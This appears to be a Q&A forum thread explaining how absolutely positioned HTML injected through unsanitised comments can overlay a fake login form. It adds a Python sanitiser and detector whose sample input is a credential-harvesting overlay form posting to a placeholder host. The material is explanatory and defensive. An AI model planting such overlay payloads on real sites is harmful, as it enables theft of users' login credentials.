Phishing And CSS position:absolute


How does the CSS position:absolute rule actually help phishing?

Can someone help me out, I'm confused :(


There are 2 answers

0
David On BEST ANSWER

Look for a section called "Overriding Page Content" here.

It's not so much that absolute positioning "helps" phishing, not any more than cars "help" drunk driving. But it is a tool that can be used for malicious purposes.

For example, say you're running a website where users can log in and post comments. Say also that you don't properly sanitize your input and output and a user determines that he can post pure HTML content to his heart's content. He decides to craft a post which includes an absolute-positioned div which mimics your login form identically and is positioned on top of it, obscuring your form. His new form posts the login credentials to his site instead of yours, and redirects the users back to your page.

The users, not suspecting anything has changed, enter their login credentials. They're presented with the same page again. Maybe they try again, maybe they click on "forgot password," maybe they give up, etc. Either way, he now has their login credentials. Did any of your users register on your site with the same credentials they use to log in to their email? Their employer? Their bank?

Basically, the combination of an insecure website and some crafted absolutely-positioned content compromised the users.
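The "properly sanitize your input and output" point in the answer above, as an added example that is not part of the original answer: a Python sketch that flags comment markup containing overlay positioning or form elements, then output-encodes the comment before it is rendered. The sample comment, the `collector.example` host, and the names `CommentAuditor`, `audit_comment` and `render_comment` are assumptions made for illustration.

```python
import html
import re
from html.parser import HTMLParser

# Constructed sample input (placeholder host): a comment carrying the kind of
# markup the answer describes.
SAMPLE_COMMENT = (
    'Nice post!'
    '<div style="position: absolute; top:0; left:0; z-index:9999">'
    '<form action="https://collector.example/login" method="post">'
    '<input name="user"><input name="pass" type="password"></form></div>'
)

OVERLAY_CSS = re.compile(r"position\s*:\s*(absolute|fixed)", re.I)
# Elements a plain-text comment field has no reason to contain.
DISALLOWED_TAGS = {"form", "input", "button", "iframe", "style", "script", "link"}


class CommentAuditor(HTMLParser):
    """Collects reasons a user comment must not be rendered as raw HTML."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag in DISALLOWED_TAGS:
            self.findings.append(f"disallowed element <{tag}>")
        for name, value in attrs:
            value = value or ""
            if name == "style" and OVERLAY_CSS.search(value):
                self.findings.append(f"overlay positioning on <{tag}>")
            if name in ("action", "formaction"):
                self.findings.append(f"{name} points to {value!r}")


def audit_comment(raw):
    """Detection only (for logging/alerting); pattern checks can be evaded."""
    auditor = CommentAuditor()
    auditor.feed(raw)
    auditor.close()
    return auditor.findings


def render_comment(raw):
    """The actual control: encode so the browser shows markup as text."""
    return html.escape(raw, quote=True)


if __name__ == "__main__":
    for finding in audit_comment(SAMPLE_COMMENT):
        print("flag:", finding)
    print(render_comment(SAMPLE_COMMENT))
```

The audit step is useful for spotting abuse attempts in logs, but the output encoding in `render_comment` is what prevents the overlay from ever being parsed as HTML.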

0
n00b On

The point of phishing is extracting information by fooling the user that we are legit / XSS etc.

Position absolute allows you to break out of the position and do everything; think how you would use that to fool the user.

The rule itself is not bad or to blame but the security of sites and users themselves.

I didn't give you an answer, but if you're not lazy you'll find it here yourself.